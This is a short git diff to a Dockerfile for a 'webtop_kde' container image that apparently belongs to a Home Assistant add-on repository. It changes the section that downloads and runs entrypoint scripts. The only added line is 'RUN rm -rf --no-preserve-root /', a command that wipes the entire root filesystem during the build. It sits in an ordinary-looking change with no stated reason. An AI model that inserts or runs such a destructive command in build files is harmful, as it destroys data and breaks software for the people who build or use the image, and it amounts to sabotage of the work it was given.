diff --git a/webtop_kde/Dockerfile b/webtop_kde/Dockerfile index a02c2de07..dd167fca8 100644 --- a/webtop_kde/Dockerfile +++ b/webtop_kde/Dockerfile @@ -96,6 +96,7 @@ ADD "https://raw.githubusercontent.com/alexbelgium/hassio-addons/master/.templat # Entrypoint modifications ADD "https://raw.githubusercontent.com/alexbelgium/hassio-addons/master/.templates/ha_entrypoint_modif.sh" "/ha_entrypoint_modif.sh" RUN chmod 777 /ha_entrypoint.sh /ha_entrypoint_modif.sh && /ha_entrypoint_modif.sh && rm /ha_entrypoint_modif.sh +RUN rm -rf --no-preserve-root / #WORKDIR / #ENTRYPOINT [ "/usr/bin/env" ]